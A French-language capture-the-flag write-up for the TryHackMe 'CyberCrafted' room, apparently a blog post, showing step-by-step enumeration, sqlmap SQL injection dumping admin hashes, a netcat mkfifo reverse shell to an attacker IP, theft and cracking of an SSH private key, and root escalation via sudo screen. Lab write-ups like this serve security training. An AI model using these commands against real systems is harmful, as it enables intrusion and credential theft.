Pwn this pay-to-win Minecraft server!
CyberCrafted est un CTF de TryHackMe. De niveau moyen, il nécessite un dénombrement assez poussé. Il reste accessible même pour les débutants. L’escalade des privilèges est plutôt sympa.
Commande :
nmap -T5 10.10.235.114
3 ports sont ouverts SSH, HTTP, et le port 25565 qui héberge le jeu Minecraft.
dirsearch -u 10.10.181.45
Dirsearch nous donne le nom de domaine du site web : http://cybercrafted.thm/
echo ‘10.10.181.45 cybercrafted.thm’ >> /etc/hosts
Commande :
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H « Host: FUZZ.cybercrafted.thm/ » -u http://cybercrafted.thm/ -fs 0
Il existe trois sous-domaines pour lesquels il faut faire une énumération avec dirsearch. Auparavant, il faut les rajouter dans le fichier hosts.
Commande :
dirsearch -u http://admin.cybercrafted.thm/
Le site http://admin.cybercrafted.thm/login.php, demande des identifiants que nous n’avons pas. De plus, l’accès ne semble pas être vulnérable. ( pas de bypass authentication )
dirsearch -u http://store.cybercrafted.thm/
Sur le site http://store.cybercrafted.thm/search.php , nous avons la possibilité d’effectuer une recherche. Cette page est vulnérable à l’injection sql ( slqi ).
Pour l’effectuer de manière automatique, il faut intercepter la requête d’une recherche dans BurpSuite. Une fois interceptée, il faut l’enregistrer et l’utiliser dans sqlmap.
Commande initiale pour tester la vulnérabilité :
sqlmap -r req.req
Commande finale ( dump des identifiants ) :
sqlmap -r req.req –dbms=mysql -D webapp -T admin –dump
En copiant le hash sur le site https://crackstation.net/ nous obtenons le mot de passe.
Sur le site, nous avons la possibilité d’entrer des commandes.
Commande :
id
Dans la mesure où on peut passer des commandes système, il est probable que l’on peut obtenir un reverse_shell.
Commande :
rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 10.11.38.124 1234 > f
Une fois le reverse_shell reçu sur nc, on se trouve avec le compte www-data. Dans le dossier /home se trouve le compte xXUltimateCreeperXx, dans lequel une magnigfique clé privée id_rsa est présente.
Commande :
ssh xXUltimateCreeperXx@127.0.0.1 -i id_rsa
La clé privée est chiffrée par une passphrase. Pour la déchiffrer, il faut utiliser ssh2john. Avant, nous allons la copier en local sur kali.
Commande :
scp id_rsa root@10.11.38.124:/root/trytohackme/cybercraft/
Commande pour cracker la clé :
ssh2john id_rsa > id_rsa.hash
john id_rsa.hash -wordlist=/usr/share/wordlists/rockyou.txt
Une fois sur le compte de xXUltimateCreeperXx et aux vues des questions posées par tryhackme, il faut trouver l’emplacement du jeu Minecraft.
Il se trouve dans /opt ( rien de bien sorcier )
Après énumération des sous-dossiers et fichiers, le mot de passe du compte cybercrafted se trouve dans le chemin suivant /opt/minecraft/cybercrafted/plugins/LoginSystem/log.txt
Commande pour basculer sur le compte de cybercrafted :
su cybercrafted
1ier commande à effectuer :
sudo -l
L’utilisateur a des droits root pour exécuter la commande /usr/bin/screen -r cybercrafted
Commande :
sudo /usr/bin/screen -r cybercrafted
on arrive sur cette fenêtre :
Pour basculer sur le compte root, il faut faire ces raccourcis clavier.
crtl a puis faire ctrl c
That’s all folks
Merci d’avoir pris la peine de venir sur le site de lire ce Write Up
J’espère qu’il vous a plus et qu’il vous apprit des nouvelles choses.
N’hésitez pas à laisse un commentaire ou à partager cet article.